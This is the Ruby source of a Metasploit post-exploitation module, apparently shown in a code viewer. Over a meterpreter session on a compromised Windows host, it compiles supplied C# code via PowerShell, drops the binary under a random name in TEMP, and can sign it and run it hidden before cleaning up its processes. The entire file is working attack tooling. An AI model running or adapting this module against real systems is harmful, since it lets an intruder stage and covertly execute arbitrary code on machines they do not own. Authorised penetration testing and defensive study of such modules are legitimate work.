CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::Windows::Powershell
10
  include Msf::Exploit::Powershell::DotNet
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Powershell .NET Compiler',
17
        'Description' => %q{
18
          This module will build a .NET source file using powershell. The compiler builds
19
          the executable or library in memory and produces a binary. After compilation the
20
          PowerShell session can also sign the executable if provided a path the
21
          a .pfx formatted certificate. Compiler options and a list of assemblies
22
          required can be configured in the datastore.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => 'RageLtMan <rageltman[at]sempervictus>',
26
        'Platform' => [ 'windows' ],
27
        'SessionTypes' => [ 'meterpreter' ],
28
        'DisclosureDate' => '2012-08-14',
29
        'Compat' => {
30
          'Meterpreter' => {
31
            'Commands' => %w[
32
              stdapi_fs_stat
33
              stdapi_sys_config_getenv
34
              stdapi_sys_config_getsid
35
              stdapi_sys_process_execute
36
            ]
37
          }
38
        }
39
      )
40
    )
41

42
    register_options(
43
      [
44
        OptPath.new('SOURCE_FILE', [true, 'Path to source code']),
45
        OptBool.new('RUN_BINARY', [false, 'Execute the generated binary', false]),
46
        OptString.new('ASSEMBLIES', [false, 'Any assemblies outside the defaults', 'mscorlib.dll, System.dll, System.Xml.dll, System.Data.dll' ]),
47
        OptString.new('OUTPUT_TARGET', [false, 'Name and path of the generated binary, default random, omit extension' ]),
48
        OptString.new('COMPILER_OPTS', [false, 'Options to pass to compiler', '/optimize']),
49
        OptString.new('CODE_PROVIDER', [true, 'Code provider to use', 'Microsoft.CSharp.CSharpCodeProvider'])
50
      ], self.class
51
    )
52
    register_advanced_options(
53
      [
54
        OptString.new('NET_CLR_VER', [false, 'Minimum NET CLR version required to compile', '4.0'])
55
      ], self.class
56
    )
57
  end
58

59
  def run
60
    # Make sure we meet the requirements before running the script
61
    unless session.type == 'meterpreter' || have_powershell?
62
      print_error 'Incompatible Environment'
63
      return 0
64
    end
65

66
    # Havent figured this one out yet, but we need a PID owned by a user, can't steal tokens either
67
    if client.sys.config.is_system?
68
      print_error 'Cannot run as system'
69
      return 0
70
    end
71

72
    # End of file marker
73
    eof = Rex::Text.rand_text_alpha(8)
74
    env_suffix = Rex::Text.rand_text_alpha(8)
75
    net_com_opts = {}
76
    net_com_opts[:target] =
77
      datastore['OUTPUT_TARGET'] ||
78
      "#{session.sys.config.getenv('TEMP')}\\#{Rex::Text.rand_text_alpha(rand(8..15))}.exe"
79
    net_com_opts[:com_opts] = datastore['COMPILER_OPTS']
80
    net_com_opts[:provider] = datastore['CODE_PROVIDER']
81
    net_com_opts[:assemblies] = datastore['ASSEMBLIES']
82
    net_com_opts[:net_clr] = datastore['NET_CLR_VER']
83
    net_com_opts[:cert] = datastore['CERT_PATH']
84

85
    begin
86
      net_com_opts[:harness] = ::File.read(datastore['SOURCE_FILE'])
87
      script = dot_net_compiler(net_com_opts)
88
      if datastore['Powershell::Post::dry_run']
89
        print_good "Compiler code:\n#{script}"
90
        return
91
      end
92
    rescue StandardError => e
93
      print_error e
94
      return
95
    end
96

97
    vprint_good "Writing to #{net_com_opts[:target]}"
98

99
    # Execute the powershell script
100
    print_status 'Building remote code.'
101
    cmd_out, running_pids, open_channels = execute_script(script, true)
102
    get_ps_output(cmd_out, eof)
103
    vprint_good "Cleaning up #{running_pids.join(', ')}"
104

105
    clean_up(nil, eof, running_pids, open_channels, env_suffix, false)
106

107
    # Check for result
108
    begin
109
      size = session.fs.file.stat(net_com_opts[:target].gsub('\\', '\\\\')).size
110
      print_good "File #{net_com_opts[:target].gsub('\\', '\\\\')} found, #{size}kb"
111
    rescue StandardError
112
      print_error "File #{net_com_opts[:target].gsub('\\', '\\\\')} not found," \
113
                  " NET CLR version #{datastore['NET_CLR_VER']} possibly not available"
114
      return
115
    end
116

117
    # Run the result
118
    if datastore['RUN_BINARY']
119
      cmd_out = session.sys.process.execute(net_com_opts[:target].gsub('\\', '\\\\'),
120
                                            nil, 'Hidden' => true, 'Channelized' => true)
121
      while (out = cmd_out.channel.read)
122
        print_good out
123
      end
124
    end
125

126
    print_good 'Finished!'
127
  end
128
end
129

130